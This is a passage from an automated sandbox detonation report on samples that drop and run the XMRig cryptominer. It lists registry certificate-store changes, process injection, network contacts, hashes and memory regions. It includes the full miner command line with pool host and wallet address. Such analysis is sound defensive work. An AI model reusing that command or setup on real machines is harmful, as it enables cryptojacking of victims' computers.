5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1588 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1588 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3944-16-0x000001F518DF0000-0x000001F518E10000-memory.dmp
memory/3944-17-0x000001F518E30000-0x000001F518E50000-memory.dmp
memory/3944-18-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-20-0x000001F51A620000-0x000001F51A640000-memory.dmp
memory/3944-19-0x000001F51A600000-0x000001F51A620000-memory.dmp
memory/3944-21-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-22-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-23-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-24-0x000001F51A600000-0x000001F51A620000-memory.dmp
memory/3944-25-0x000001F51A620000-0x000001F51A640000-memory.dmp
memory/3944-26-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-27-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-28-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-29-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-30-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-31-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-32-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-33-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-34-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-35-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-36-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-37-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-38-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-39-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-40-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-41-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-42-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-43-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-44-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-45-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-46-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-47-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-48-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-49-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-50-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-51-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-52-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-53-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-54-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-55-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-56-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-57-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-58-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-59-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-60-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-61-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-62-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-63-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-64-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-65-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-66-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-67-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-68-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-69-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-70-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-71-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-72-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-73-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-74-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-75-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-76-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-77-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-78-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-79-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-80-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-81-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-82-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-83-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-84-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:10
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4488 wrote to memory of 3736 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4488 wrote to memory of 3736 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3736-16-0x0000028BE1960000-0x0000028BE1980000-memory.dmp
memory/3736-17-0x0000028BE19B0000-0x0000028BE19D0000-memory.dmp
memory/3736-18-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-21-0x0000028BE1A10000-0x0000028BE1A30000-memory.dmp
memory/3736-20-0x0000028BE19D0000-0x0000028BE19F0000-memory.dmp
memory/3736-19-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-22-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-23-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-24-0x0000028BE19D0000-0x0000028BE19F0000-memory.dmp
memory/3736-25-0x0000028BE1A10000-0x0000028BE1A30000-memory.dmp
memory/3736-26-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-27-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-28-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-29-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-30-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-31-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-32-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-33-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-34-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-35-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-36-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-37-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-38-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-39-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-40-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-41-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-42-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-43-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-44-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-45-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-46-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-47-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-48-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-49-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-50-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-51-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-52-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-53-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-54-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-55-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-56-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-57-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-58-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-59-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-60-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-61-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-62-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-63-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-64-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-65-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-66-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-67-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-68-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-69-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-70-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-71-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-72-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-73-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-74-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-75-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-76-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-77-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-78-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-79-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-80-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-81-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-82-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-83-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-84-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56b